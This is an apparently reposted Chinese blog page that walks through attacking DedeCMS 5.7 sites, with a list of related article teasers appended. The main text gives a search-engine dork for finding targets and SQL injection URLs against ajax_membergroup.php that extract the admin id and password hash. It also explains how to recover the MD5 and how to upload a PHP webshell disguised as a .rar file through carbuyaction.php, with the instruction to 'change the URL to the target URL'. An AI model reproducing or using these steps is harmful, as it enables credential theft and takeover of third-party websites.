mysql 5.7 注入_dedecms5.7最新注入和上传漏洞

最新推荐文章于 2023-06-20 19:32:25 发布
最新推荐文章于 2023-06-20 19:32:25 发布
阅读量1.2k 收藏
点赞数 1
文章标签: mysql 5.7 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34832150/article/details/113974621
版权

漏洞描述:百度搜索关键字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间,然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面, 然后访问/

漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

只要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

http://www.webanqn.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">

file:

newname:

< button class="button2" type="submit">提交

把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

缪加
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1315
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
dedecms5.7最新漏洞修复
a1079540945的专栏
10-15 4161
文章来源:武汉八音猫科技有限公司
dedecms 5.7 gbk版本 utf版本分享以及关闭会员功能解决方法
weixin_49328389的博客
03-19 156
最近在安装dedecmsv5.7版本时,发现在dedecms官网上发现现在只有utf版本,所以分享一下我的资源。点击系统 - 会员管理- 开启会员功能 即可。注意账号 和密码 都为admin。访问127.0.0.1/dede。关闭会员功能,解决方法如下。
(织梦cms)dedecms5.7注入上传0day
热门推荐
Yatere的天平秤
04-29 1万+
漏洞类型:注入漏洞上传漏洞 漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。   注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergro
Mysql漏洞处理之升级版本到5.7.42/5.7.43过程指导手册
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-20 1万+
某次安全漏扫,发现MySQL大量漏洞,基于Mysql之用于内网,且版本确实有点旧,考虑升级,综合漏洞分析,只能升级到最新5.7.42和8.0.33,现场环境:Mysql 5.7.28、5.7.20和mysql:8.0.21。附录:[mysql5.7mysql8.0区别(https://www.cnblogs.com/harda/p/16497988.html)、1)可以获取到MySQL/MariaDB/Percona/TiDB Server版本信息,版本泄露,隐藏版本即可。
mysql5.7的高危漏洞_应用CVE: 最新Mysql高危漏洞介绍
Aplumage的专栏
08-16 6854
MySQL官方最近做了一个大的安全漏洞补丁,修复了25 个安全漏洞,关于这些漏洞细节官方和媒体目前为止还有比较少的介绍和分析文章。在此笔者搜集下相关的详细,从邮件讨论组趴到一些细节信息,在此介绍一下几个比较重要的、高危的漏洞。包括CVE-2018-2696,CVE-2018-2591和CVE-2018-2562。 CVE-2018-2696 mysql: sha256_password 认证长密码拒绝式攻击 该漏洞源于MySQL sha256_password认证插件,该插件没有对认证密码的长度进行限制
DEDE_5.7(1).rar
05-29
《DEDE_5.7(1).rar》是一款基于PHP和MySQL的内容管理系统——织梦CMS(DEDECMS)的模块集合包,主要包含了文章、图集、软件等五个核心功能模块。这个版本号为V5.7,由用户junhong在2013年2月12日进行了最后一次编辑...
TAGdedeGBK-5.7.zip_WEB开发_PHP_
08-11
"TAGdedeGBK-5.7.zip"这个压缩包文件,结合其标题和描述,暗示了它与织梦CMS(DedeCMS)的一个功能更新有关,特别是关于TAG静态化的GBK编码实现。 织梦CMS(DedeCMS)是一款广泛使用的开源内容管理系统,它支持PHP...
DEDECMS5.7星星评分插件
04-30
DEDECMS5.7星星评分插件是一款专为织梦内容管理系统(DEDECMS v5.7)设计的扩展组件,旨在为网站内容提供一种直观、用户友好的评分功能。这款插件允许访客对文章、产品或其他内容进行打分,以五角星的形式展示,从而...
易采站长源码DEDECMS蓝色模板 v5.7.zip
11-22
【标题】"易采站长源码DEDECMS蓝色模板 v5.7.zip"指的是一个基于DEDECMS(织梦内容管理系统)的网站模板,版本号为5.7,设计风格为蓝色调。DEDECMS是一款广泛应用的开源PHP网站管理框架,尤其在个人站长和中小企业中...
地方门户新闻文章资讯网源码 v5.7 GBK
11-26
这个版本号(v5.7)表明它是经过多次更新和优化的成熟产品,适应了互联网的发展需求。GBK编码是中国大陆广泛使用的汉字编码标准,确保了源码能正确处理中文字符。 【描述】提到,这款源码适用于创建大型新闻资讯...
mysql5.7的高危漏洞_某国产数据库发现超高危漏洞 可能存在重大风险
weixin_42393829的博客
02-02 1179
原标题:某国产数据库发现超高危漏洞 可能存在重大风险近日,某国产数据库确认存在一超高危漏洞,可能导致重大安全风险。该漏洞被“国家信息安全漏洞库”(CNNVD)发布并得到数据库厂商官方确认,漏洞编号CNNVD-201702-977。这是目前该国产数据库被确认的唯一超高危漏洞,利用此漏洞可以直接夺取操作系统最高控制权限。通常,我们按照对数据库的机密性、完整性和可用性的影响程度,对安全漏洞进行等级评定,...
高级DBA带你处理Mysql数据库漏洞修复方法以及升级版本方法指南最详细全网唯一
nasen512的博客
09-21 1万+
mysql修复漏洞方法window平台以及linux平台非常详细,全网独一份,值得收藏,尤其是DBA跟运维实施必须收藏!运维工程师比如用到!
Dedecms V5.7 SP2版本漏洞利用
dahege666的博客
03-07 9443
一、环境搭建 系统:Win10(64位) 工具:Phpstudy 源码:DedeCMS-V5.7-GBK-SP2-Full 二、安装phpstudy https://www.xp.cn/download.html 安装完成后.... 三、下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5....
MySQL提权/条件竞争漏洞分析和利用(37)
yyj1781572的博客
04-30 1473
通过本实验,能够掌握MySQL提权/条件竞争漏洞的原理,并能够复现该漏洞,以及掌握该漏洞的修复方法。
mysql[漏洞打补丁]小版本升级5.7.25到5.7.28
m0_67401920的博客
04-07 1643
mysql[漏洞]小版本升级 事件背景 近日,公司进行安全扫描,发现mysql存在漏洞,高危漏洞编号为(CVE-2019-3822),此外还有多个中危,低危漏洞,目前mysql版本为5.7.25 解决方案 对mysql进行小版本升级到5.7.28,生产环境无法联网,用rpm 包离线安装,选择就地升级。 Mysql的两种升级方式 就地升级(In-place Upgrade) 关闭旧版本mysql,用新的替换旧的二进制文件或软件包,在现有数据目录上重启数据库,执行mysql_upgrade 逻辑升级(L
dedecms织梦去除版权powered by dedecms方法
叶落无痕的博客
07-19 2682
织梦官方5.7版本升级后,版权标签{dede:global name='cfg_powerby'/}调用出来后会出现:“powered by dedecms”,织梦58建议您不要去掉,毕竟用了开源程序,最好尊重下版权,织梦开源程序也不容易,希望大家也支持下。 (此图片来源于网络,如有侵权,请联系删除! ) 现在告诉大家怎么去除织梦底部的powered by dedecms版权信息: 在 include/dedesql.class.php文件中找到第588行: 1 2 ..
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3507
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
mysql 5.7 漏洞_应用CVE: 最新Mysql高危漏洞介绍
weixin_31212247的博客
01-19 5477
MySQL官方最近做了一个大的安全漏洞补丁,修复了25 个安全漏洞,关于这些漏洞细节官方和媒体目前为止还有比较少的介绍和分析文章。在此笔者搜集下相关的详细,从邮件讨论组趴到一些细节信息,在此介绍一下几个比较重要的、高危的漏洞。包括CVE-2018-2696,CVE-2018-2591和CVE-2018-2562。CVE-2018-2696 mysql: sha256_password 认证长密码...
mysql5.7 row_number
最新发布
07-25
MySQL 5.7中,没有内置的ROW_NUMBER()函数来实现行号的功能。但是,你可以使用变量来模拟ROW_NUMBER()函数的行为。下面是一个示例SQL语句,可以在MySQL 5.7中实现类似ROW_NUMBER()的功能: ``` SELECT @rownum ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值